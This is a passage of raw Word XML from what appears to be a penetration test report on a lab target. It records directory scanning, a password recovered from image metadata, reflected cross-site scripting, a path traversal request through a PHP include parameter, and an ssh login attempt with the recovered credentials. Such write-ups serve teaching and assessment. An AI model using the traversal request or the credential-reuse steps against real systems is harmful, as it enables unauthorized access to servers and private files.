          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BB4CFAA" wp14:editId="6BBA8EBC">
            <wp:extent cx="4982270" cy="1581371"/>
            <wp:effectExtent l="19050" t="19050" r="8890" b="19050"/>
            <wp:docPr id="1700938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8301" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4982270" cy="1581371"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="19050">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Login Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07770B10" w14:textId="21726F73" w:rsidR="000950D9" w:rsidRDefault="000950D9" w:rsidP="00A26E1B">
      <w:r>
        <w:t xml:space="preserve">The assessment team attempted to inject malicious SQL code into the username </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>parameter, but</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> were unsuccessful. The application successfully encoded many of the special characters needed for SQL injection. However, because the application returned the user input in its response, the Hyperthetical team was able to inject malicious JavaScript code that would be executed in the user’s browser when the page loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD71442" w14:textId="76147033" w:rsidR="000950D9" w:rsidRDefault="000950D9" w:rsidP="000950D9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C5086B0" wp14:editId="5ED35AA5">
            <wp:extent cx="5372100" cy="933450"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:docPr id="193601704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7042" name="Picture 12" descr="A picture containing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9615" b="42353"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5372100" cy="9334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br/>
      </w:r>
      <w:r w:rsidRPr="000950D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JavaScript Alert Box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C03F4E2" w14:textId="4E920D72" w:rsidR="00BF2359" w:rsidRDefault="000950D9" w:rsidP="00BF2359">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The assessment team’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan showed three potentially interesting directories: </w:t>
      </w:r>
      <w:r w:rsidRPr="000950D9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/data/</w:t>
      </w:r>
      <w:r w:rsidRPr="000950D9">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000950D9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/images/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="000950D9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/internal/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidR="00AF55AB" w:rsidRPr="00AF55AB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/data/</w:t>
      </w:r>
      <w:r w:rsidR="00AF55AB">
        <w:t xml:space="preserve"> directory contained sensitive information, including </w:t>
      </w:r>
      <w:r w:rsidR="00AF55AB" w:rsidRPr="00AF55AB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>flag1</w:t>
      </w:r>
      <w:r w:rsidR="00AF55AB">
        <w:t xml:space="preserve">. The image of the NBN CEO, </w:t>
      </w:r>
      <w:r w:rsidR="00AF55AB" w:rsidRPr="00AF55AB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>CEO_gibson.jpg</w:t>
      </w:r>
      <w:r w:rsidR="00AF55AB">
        <w:t>, contained a password in the</w:t>
      </w:r>
      <w:r w:rsidR="00BF2359">
        <w:t xml:space="preserve"> file metadata.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF2359" w14:paraId="11F99CD4" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5ED632E1" w14:textId="77777777" w:rsidR="00BF2359" w:rsidRPr="00F351BE" w:rsidRDefault="00BF2359" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>exiftool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> CEO_gibson.jpg                       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A6AC518" w14:textId="77777777" w:rsidR="00BF2359" w:rsidRPr="00884BFC" w:rsidRDefault="00BF2359" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>ExifTool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> Version Number       </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> 12.57</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D17FE03" w14:textId="77777777" w:rsidR="00BF2359" w:rsidRPr="00884BFC" w:rsidRDefault="00BF2359" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">File Name                     </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> CEO_gibson.jpg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C78A031" w14:textId="77777777" w:rsidR="00BF2359" w:rsidRPr="00884BFC" w:rsidRDefault="00BF2359" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AA64F3E" w14:textId="77777777" w:rsidR="00BF2359" w:rsidRPr="00884BFC" w:rsidRDefault="00BF2359" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">Title                         </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> profile picture</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="493AD663" w14:textId="77777777" w:rsidR="00BF2359" w:rsidRPr="00884BFC" w:rsidRDefault="00BF2359" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">Description                   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> profile picture</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="713F7E23" w14:textId="77777777" w:rsidR="00BF2359" w:rsidRPr="00884BFC" w:rsidRDefault="00BF2359" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">Warning                       </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> [minor] Fixed incorrect URI for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>xmlns:MicrosoftPhoto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2BD6ED51" w14:textId="77777777" w:rsidR="00BF2359" w:rsidRPr="00884BFC" w:rsidRDefault="00BF2359" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">Flash Model                   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00884BFC">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve"> passwd:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5B05C7" w14:textId="77777777" w:rsidR="00BF2359" w:rsidRPr="004E111C" w:rsidRDefault="00BF2359" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30023C78" w14:textId="77777777" w:rsidR="00BF2359" w:rsidRDefault="00BF2359" w:rsidP="00BF2359">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Image Metadata </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617C990" w14:textId="1AEFF069" w:rsidR="00BF2359" w:rsidRDefault="00BF2359" w:rsidP="00A26E1B">
      <w:r>
        <w:t xml:space="preserve">The assessment team used the stored password to log into the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF2359">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web application account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073E8BAC" w14:textId="7796ACC3" w:rsidR="00BF2359" w:rsidRPr="00BF2359" w:rsidRDefault="00BF2359" w:rsidP="00BF2359">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF2359">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46C8DA28" wp14:editId="5FE3F355">
            <wp:extent cx="5943600" cy="3172460"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="27940"/>
            <wp:docPr id="115379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6189" name="Picture 1" descr="Graphical user interface&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3172460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="19050">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gibson Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B87F2" w14:textId="529E9843" w:rsidR="00BF2359" w:rsidRDefault="00BF2359" w:rsidP="00A26E1B">
      <w:r>
        <w:t xml:space="preserve">The application returned the account username at the top of the welcome page. The data reflected in the application response came from a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2359">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL parameter. The assessment team was able to achieve Cross-Site Scripting by injecting malicious JavaScript code into the parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41754068" w14:textId="6986B166" w:rsidR="00BF2359" w:rsidRDefault="00BF2359" w:rsidP="00A26E1B">
      <w:r>
        <w:t xml:space="preserve">Next, the assessment team </w:t>
      </w:r>
      <w:r w:rsidRPr="002943DD">
        <w:t>accessed the Future Customer List</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> linked at the bottom of the welcome page where they found </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2359">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>flag 2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8DEE1A" w14:textId="201F0649" w:rsidR="00BF2359" w:rsidRPr="00BF2359" w:rsidRDefault="00BF2359" w:rsidP="00BF2359">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF2359">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28B6A3CE" wp14:editId="768E7838">
            <wp:extent cx="2200582" cy="943107"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="28575"/>
            <wp:docPr id="10297450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5065" name="Picture 1" descr="Graphical user interface&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2200582" cy="943107"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="19050">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CBBD24" w14:textId="68186149" w:rsidR="002943DD" w:rsidRPr="002943DD" w:rsidRDefault="00BF2359" w:rsidP="002943DD">
      <w:r>
        <w:t xml:space="preserve">The page hosting the future customer list, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2359">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>internal/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF2359">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>customers.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, loads the customer </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">list, stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="009B0E35">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/data/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B0E35">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>customers.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, using the</w:t>
      </w:r>
      <w:r w:rsidRPr="009B0E35">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL parameter. The</w:t>
      </w:r>
      <w:r w:rsidRPr="009B0E35">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter value is the location of the list.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The value of </w:t>
      </w:r>
      <w:r w:rsidRPr="0058427B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is inserted directly into the </w:t>
      </w:r>
      <w:r w:rsidRPr="0058427B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">allowed the Hyperthetical team to access other files stored on the server by changing the value. Although they were unable to access certain restricted resources, they were able to access data in the server user account’s home directory, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0058427B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>flag3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="002943DD" w14:paraId="7DB6F531" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4A23DDCD" w14:textId="77777777" w:rsidR="002943DD" w:rsidRPr="0058427B" w:rsidRDefault="002943DD" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="0058427B">
              <w:t xml:space="preserve">GET </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0058427B">
              <w:t>/internal/customers.php?</w:t>
            </w:r>
            <w:r w:rsidRPr="0058427B">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>list</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0058427B">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>=..%2Fdata%2f..%2f..%2f..%2f..%2fhome%2fgibson%2fflag3</w:t>
            </w:r>
            <w:r w:rsidRPr="0058427B">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D00E580" w14:textId="77777777" w:rsidR="002943DD" w:rsidRPr="0058427B" w:rsidRDefault="002943DD" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="0058427B">
              <w:t>Host: 10.10.0.66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06714C26" w14:textId="77777777" w:rsidR="002943DD" w:rsidRPr="0058427B" w:rsidRDefault="002943DD" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r w:rsidRPr="0058427B">
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43830FD1" w14:textId="77777777" w:rsidR="002943DD" w:rsidRPr="0058427B" w:rsidRDefault="002943DD" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="0058427B">
              <w:t>Cookie: authenticated=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16029FBE" w14:textId="77777777" w:rsidR="002943DD" w:rsidRPr="00F62F5D" w:rsidRDefault="002943DD" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="0058427B">
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57243751" w14:textId="191C2732" w:rsidR="002943DD" w:rsidRPr="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002943DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request to Load Flag3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEBE9BF" w14:textId="77777777" w:rsidR="00BF2359" w:rsidRPr="0058427B" w:rsidRDefault="00BF2359" w:rsidP="00BF2359">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77D03E87" wp14:editId="0AFBB14A">
            <wp:extent cx="4428490" cy="2653462"/>
            <wp:effectExtent l="19050" t="19050" r="10160" b="13970"/>
            <wp:docPr id="1722687116" name="Picture 1722687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5695" name="Picture 7" descr="Graphical user interface,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093" t="24582" r="4108" b="4995"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4467324" cy="26767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Pr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 3 Contents Displayed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F18C15F" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F940729" w14:textId="04AAFF82" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="00A26E1B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Finally, the assessment team used the credentials they discovered in </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF55AB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>CEO_gibson.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="002943DD">
        <w:t xml:space="preserve"> to access the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002943DD">
        <w:t xml:space="preserve"> account on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r w:rsidRPr="002943DD">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002943DD">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002943DD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="002943DD" w14:paraId="37E5C8CE" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4C53C821" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)-[~/Desktop/Final/Scans]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4531709B" w14:textId="77777777" w:rsidR="002943DD" w:rsidRDefault="002943DD" w:rsidP="002943DD">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">└─$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
